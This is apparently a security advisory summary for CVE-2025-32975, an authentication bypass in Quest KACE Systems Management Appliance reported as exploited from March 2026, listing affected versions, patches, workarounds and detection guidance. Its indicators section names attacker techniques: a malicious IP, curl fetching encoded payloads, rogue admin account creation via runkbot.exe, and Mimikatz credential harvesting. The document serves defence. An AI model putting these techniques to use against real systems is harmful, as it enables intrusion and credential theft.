Full Report
Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), according to Arctic Wolf. The cybersecurity company said it observed malicious activity starting the week of March 9, 2026, in customer environments that's consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. It's
Analysis Summary
# Vulnerability: Quest KACE SMA Authentication Bypass
## CVE Details
- **CVE ID:** CVE-2025-32975
- **CVSS Score:** 10.0 (Critical)
- **CWE:** Authentication Bypass (Impersonation)
## Affected Systems
- **Products:** Quest KACE Systems Management Appliance (SMA)
- **Versions:** All versions prior to the patches released in May 2025 (Specifically older iterations of branches 13.x and 14.x)
- **Configurations:** Systems exposed directly to the internet are at the highest risk.
## Vulnerability Description
CVE-2025-32975 is a maximum-severity authentication bypass vulnerability. It allows an unauthenticated remote attacker to impersonate legitimate users without providing valid credentials. Successful exploitation grants the attacker the ability to hijack administrative accounts, leading to full control over the appliance.
## Exploitation
- **Status:** Exploited in the wild (Observed by Arctic Wolf starting March 9, 2026).
- **Complexity:** Low
- **Attack Vector:** Network (Remote)
## Impact
- **Confidentiality:** Total (Complete access to system data and credentials)
- **Integrity:** Total (Ability to modify configurations, add admin accounts, and run scripts)
- **Availability:** Total (Potential for full system takeover or shutdown)
## Remediation
### Patches
Quest released fixes for this issue in May 2025. Administrators should ensure they are on the following versions or newer:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
### Workarounds
- **Network Isolation:** Immediately remove KACE SMA instances from the public internet and restrict access via VPN or Zero Trust Network Access (ZTNA).
## Detection
### Indicators of Compromise (IoCs)
- **Malicious IP:** 216.126.225[.]156
- **Tooling:** Use of `curl` to download Base64-encoded payloads.
- **Process Activity:** Unusual execution of `runkbot.exe` to create new administrative accounts.
- **Persistence:** Windows Registry modifications initiated via PowerShell.
- **Lateral Movement:** Unauthorized RDP connections to backup servers (e.g., Veeam, Veritas) or Domain Controllers.
### Detection Methods
- Audit SMA logs for the creation of unexpected administrative accounts.
- Monitor for "net time" and "net group" commands, which indicate discovery activity.
- Check for the presence of Mimikatz or similar credential harvesting tools in system memory or logs.
## References
- **Quest Advisory:** [https://support.quest.com/kb/4379499/quest-response-to-kace-sma-vulnerabilities-cve-2025-32975-cve-2025-32976-cve-2025-32977-cve-2025-32978]
- **NVD Entry:** [https://nvd.nist.gov/vuln/detail/CVE-2025-32975]
- **Security Report:** [https://thehackernews.com/2026/03/hackers-exploit-cve-2025-32975-cvss-100.html]